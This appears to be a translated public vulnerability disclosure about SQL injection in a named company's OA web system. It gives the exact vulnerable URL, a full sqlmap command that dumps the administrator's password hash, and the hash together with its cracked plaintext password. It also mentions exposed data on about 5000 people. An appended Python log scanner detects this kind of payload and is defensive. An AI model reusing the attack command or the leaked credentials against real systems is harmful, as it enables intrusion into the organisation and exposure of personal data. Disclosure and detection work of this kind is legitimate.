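2016-05-03: Details reported to the vendor, awaiting vendor handling.
2016-05-09: The vendor actively ignored the vulnerability; details disclosed to the public.
When I went downstairs today I took out the trash on the way, and while throwing it away I noticed a packaging bag with Winxuan (文轩网) printed on it. So I came back and tested it, and did not expect it to set off one bloody mess after another.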
oa.winxuan.com
http://oa.winxuan.com/ServiceAction/com.velcro.base.GetDataAction?action=checkname&formid=1
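The formid parameter is vulnerable to injection.
350 databases. Because sqlmap could not display them directly, I went through the logs and arranged them by hand one by one; give me 20 points just for that dedication.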
JSP
back-end DBMS: Oracle
Database: OAUSER
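Because there are so many tables, I did not know which one held the administrator account. A statement can be used to query it directly in sqlmap. The default administrator is sysadmin.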
C:\Python27\sqlmap>sqlmap.py -u "http://oa.winxuan.com/ServiceAction/com.velcro.base.GetDataAction?action=checkname&formid=1" -p formid --tamper=space2comment --batch -D zuzhibu -T sysuser --sql-query "select logonpass from sysuser where longonname='sysadmin'"
e3570e9e977fabb2ac818edc9a6a2e38
After decryption it is asdlkj321
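The sqlmap command above uses --tamper=space2comment, which replaces spaces in the formid payload with inline comments. As an added example (not part of the original report), the following Python code flags such requests to this endpoint in web access logs; the combined log format, the allowed formid pattern and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

ENDPOINT = "/ServiceAction/com.velcro.base.GetDataAction"
# Assumption: legitimate form ids are short alphanumeric tokens.
FORMID_OK = re.compile(r"^[A-Za-z0-9]{1,32}$")
# space2comment swaps spaces for /**/, so inline comments are a strong signal.
INLINE_COMMENT = re.compile(r"/\*.*?\*/")
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (combined log format, documentation IP ranges).
_Q = ENDPOINT + "?action=checkname&formid="
SAMPLE_LOG = [
    '192.0.2.10 - - [03/May/2016:10:00:01 +0800] "GET ' + _Q + '1 HTTP/1.1" 200 12',
    '198.51.100.7 - - [03/May/2016:10:00:05 +0800] "GET ' + _Q
    + '1%27/**/AND/**/%271%27=%271 HTTP/1.1" 200 12',
    '203.0.113.5 - - [03/May/2016:10:00:09 +0800] "GET ' + _Q
    + '1%20OR%201%3D1 HTTP/1.1" 200 12',
    '203.0.113.5 - - [03/May/2016:10:00:11 +0800] "GET /index.jsp?formid=%27 HTTP/1.1" 200 5',
]

def classify(formid):
    """Return None for a well-formed formid, otherwise a reason string."""
    if FORMID_OK.match(formid):
        return None
    if INLINE_COMMENT.search(formid):
        return "sql-inline-comment"
    return "unexpected-characters"

def scan(lines):
    """Yield (client_ip, reason, decoded_formid) for suspicious requests."""
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        ip, target = m.groups()
        url = urlsplit(target)
        if url.path != ENDPOINT:
            continue
        # parse_qs percent-decodes, so encoded payloads are checked in clear form.
        for formid in parse_qs(url.query, keep_blank_values=True).get("formid", []):
            reason = classify(formid)
            if reason:
                yield ip, reason, formid

def summarize(lines):
    """Count suspicious requests per client address."""
    return Counter(ip for ip, _, _ in scan(lines))

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same allowlist check belongs in the application itself, ahead of a parameterized query, so that a malformed formid never reaches the database.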
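Back-end management information for 5000 people
A primary school management system where videos can be viewed, among other things. A large amount of sensitive information.
Stopping at this point, mwah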
Severity: no impact, ignored by vendor
Ignored at: 2016-05-09 09:00
Vulnerability Rank: 15 (WooYun rating)
None yet